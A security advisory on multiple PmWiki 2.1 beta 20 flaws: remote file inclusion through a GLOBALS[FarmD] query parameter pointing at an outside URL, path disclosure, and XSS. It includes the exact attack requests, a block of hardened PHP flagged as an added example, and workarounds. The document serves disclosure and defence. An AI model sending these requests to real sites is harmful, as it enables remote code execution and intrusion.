PmWiki Multiple Vulnerabilities

Name:             Multiple Vulnerabilities in PmWiki
Systems Affected: PmWiki (verified on 2.1 beta 20)
Severity:         Medium Risk
Vendor:           www.pmichaud.com/wiki/PmWiki/PmWiki
Advisory:         http://www.ush.it/2005/11/28/pmwiki-multiple-vulnerabilities/
Advisory:         http://www.ush.it/team/ascii/hack-PmWiki/advisory.txt
Author:           Francesco "aScii" Ongaro (ascii at katamail . com)
Date:             20060119

I. BACKGROUND

PmWiki is a PHP wiki program; more information is available at the vendor site.

II. DESCRIPTION

PmWiki is vulnerable to remote arbitrary file inclusion because of the mechanism it uses to sanitize global variables. The incriminated code is:

    if (ini_get('register_globals'))
      foreach($_REQUEST as $k=>$v) { unset(${$k}); }

    [..CUT..]

    SDV($FarmD,dirname(__FILE__));

    [..CUT..]

    function SDV(&$v,$x) { if (!isset($v)) $v=$x; }

As you can see, instead of disabling register_globals at runtime, the code tries to unset every $_REQUEST key. $FarmD is the base path for all includes and many data files, and SDV() overwrites a variable only if it is not already set.

III. ANALYSIS

This vulnerability exists only with register_globals on. If you cannot disable register_globals, you should at least disable remote fopens.

*** Path disclosure in index.php/pmwiki.php ***

    /pmwiki-2.1.beta20/pmwiki.php?GLOBALS&_SERVER&_REQUEST&_GET&_POST&_ENV

The incriminated GLOBALS sanitization code will unset any variable for you.

*** Arbitrary remote file inclusion in index.php/pmwiki.php ***

    /pmwiki-2.1.beta20/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.ush.it

You will get:

    Warning: main(http://www.ush.it/scripts/stdconfig.php) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in \pmwiki-2.1.beta20\pmwiki.php on line 276

    Warning: main() [function.include]: Failed opening 'http://www.ush.it/scripts/stdconfig.php' for inclusion in \pmwiki-2.1.beta20\pmwiki.php on line 276

While $FarmD allows remote files to be included, $WorkDir allows PmWiki to be exploited through directory-traversal includes.
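For comparison, here is a hardened bootstrap written for this advisory (added example, not PmWiki's own code). Rather than unsetting every request key after the fact, it refuses to run under register_globals, assigns $FarmD unconditionally instead of through SDV(), and checks the include path before use; the helper name safe_include_path() and the stdconfig.php location are assumptions.

```php
<?php
// Added example, not PmWiki code: a fail-closed replacement for the
// register_globals clean-up quoted above.

// 1. Refuse the unsafe INI setting outright. Undoing register_globals from
//    userland cannot be done reliably (the ?GLOBALS trick above shows why).
if (ini_get('register_globals')) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('register_globals must be Off');
}

// 2. Derive the include base from the script location only. A plain
//    assignment (not SDV()) means a pre-existing $FarmD is never kept.
$FarmD = dirname(__FILE__);

// 3. Validate the final include path: no URL wrapper scheme, the file must
//    exist, and it must resolve inside the base directory (realpath()
//    collapses any ../ components, so traversal shows up as an escape).
function safe_include_path($base, $relative)
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $base)) {
        return false;                       // http://, ftp://, php:// ...
    }
    $root = realpath($base);
    $file = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($root === false || $file === false) {
        return false;                       // missing directory or file
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return false;                       // escaped the base directory
    }
    return $file;
}

// Assumed location of the core config, matching the warning text above.
$stdconfig = safe_include_path($FarmD, 'scripts/stdconfig.php');
if ($stdconfig === false) {
    exit('refusing to include stdconfig.php from an unsafe location');
}
include_once $stdconfig;
```

Where register_globals cannot be switched off, the same path check still blocks the remote case, and setting allow_url_fopen=Off (the advisory's workaround) removes the remote wrappers at the interpreter level.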
*** Multiple XSS ***

As with GLOBALS[FarmD], it is possible to inject malicious JS and HTML code into some variables that are later echoed. A number of variables have to be redefined for PmWiki to run without errors and display the injected code.

IV. DETECTION

PmWiki 2.1 beta 20 is vulnerable. Older versions were not verified.

V. WORKAROUND

Setting register_globals to Off will fix the issue. To reduce the impact of this vulnerability you can also disable remote fopens, which turns the bug into an arbitrary directory-traversal file include. For a proper fix, wait for an official patch.

VI. VENDOR RESPONSE

No vendor response at this time.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20060119 Bug discovered
20060119 Internal release

IX. CREDIT

Francesco "aScii" Ongaro is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.